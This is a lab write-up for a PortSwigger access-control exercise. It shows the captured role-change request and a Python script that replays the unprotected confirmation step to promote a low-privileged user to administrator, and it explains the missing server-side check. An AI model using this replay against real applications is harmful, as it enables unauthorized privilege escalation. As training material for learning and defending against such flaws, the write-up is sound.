PortSwigger Lab: Multi-step process with no access control on one step
Task
This lab has an admin panel with a flawed multi-step process for changing a user's role. You can familiarize yourself with the admin panel by logging in using the credentials administrator:admin.
To solve the lab, log in using the credentials wiener:peter and exploit the flawed access controls to promote yourself to become an administrator.
Attempt
First let's understand how the multi-step process for changing a user's role works. As administrator:
- Log in as administrator
- Go to the admin panel
- Select a user
- Press the 'Upgrade user' button
- Press 'Yes' when prompted 'Are you sure?'
- The user's role is set to admin
In the last step (the 'Yes' confirmation), the browser sends the request below:
POST /admin-roles HTTP/2
Host: ID.web-security-academy.net
Cookie: session=COOKIE
Content-Length: 45
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Origin: https://ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://ID.web-security-academy.net/admin-roles
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
action=upgrade&confirmed=true&username=carlos
While you can't load the admin panel (and therefore can't reach the first steps of the process) unless you're an admin, the server does not check the role again on the final confirmation request. Replaying the POST above with wiener's session cookie and username=wiener in the body, straight from Burp Repeater, upgraded wiener to administrator and solved the lab. The root cause is exactly what the lab title says: access control is enforced on the earlier steps but not on the one step that actually changes the role, so every step of a privileged multi-step process needs its own server-side authorization check.
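The replay described above, scripted rather than done by hand in Repeater. This is an added example and not part of the lab or the original write-up; the lab host (the `ID` placeholder), the session cookie value, and the check that `/admin` returns 200 once the role has changed are assumptions for illustration. Only the Cookie header and the form body are assumed to matter for the bypass; the browser fingerprint headers from the captured request are left out.

```python
# Added example (not from the PortSwigger lab or the original write-up).
# Replays the unprotected final step of the role-change process with a
# low-privileged user's session, then checks whether /admin is reachable.
import http.client
import ssl
import sys
from urllib.parse import urlencode

LAB_HOST = "ID.web-security-academy.net"  # assumption: replace ID with your lab instance
SESSION = "COOKIE"                         # assumption: replace with wiener's session cookie


def build_upgrade_request(username, session, host=LAB_HOST):
    """Build (path, headers, body) for the POST /admin-roles confirmation step.

    The body mirrors the captured request: action=upgrade&confirmed=true&username=...
    Only the session cookie is swapped for the low-privileged user's cookie.
    """
    body = urlencode({"action": "upgrade", "confirmed": "true", "username": username})
    headers = {
        "Host": host,
        "Cookie": f"session={session}",
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": f"https://{host}",
        "Referer": f"https://{host}/admin-roles",
        "Content-Length": str(len(body)),
    }
    return "/admin-roles", headers, body


def send_upgrade(username, session, host=LAB_HOST):
    """Send the replayed confirmation request; return (status, Location header)."""
    path, headers, body = build_upgrade_request(username, session, host)
    conn = http.client.HTTPSConnection(host, context=ssl.create_default_context())
    conn.request("POST", path, body=body, headers=headers)
    resp = conn.getresponse()
    resp.read()
    return resp.status, resp.getheader("Location")


def admin_panel_reachable(session, host=LAB_HOST):
    """Assumption: /admin returns 200 for admins and is blocked for everyone else."""
    conn = http.client.HTTPSConnection(host, context=ssl.create_default_context())
    conn.request("GET", "/admin", headers={"Cookie": f"session={session}"})
    resp = conn.getresponse()
    resp.read()
    return resp.status == 200


if __name__ == "__main__":
    # usage: python3 replay.py <lab-host> <wiener-session-cookie>
    host = sys.argv[1] if len(sys.argv) > 1 else LAB_HOST
    cookie = sys.argv[2] if len(sys.argv) > 2 else SESSION
    status, location = send_upgrade("wiener", cookie, host)
    print(f"POST /admin-roles -> {status} {location or ''}")
    print("admin panel reachable as wiener:", admin_panel_reachable(cookie, host))
```

Because the access check lives only on the pages that lead up to the confirmation, the script never visits them; it goes straight to the last step, which is the whole point of the bypass.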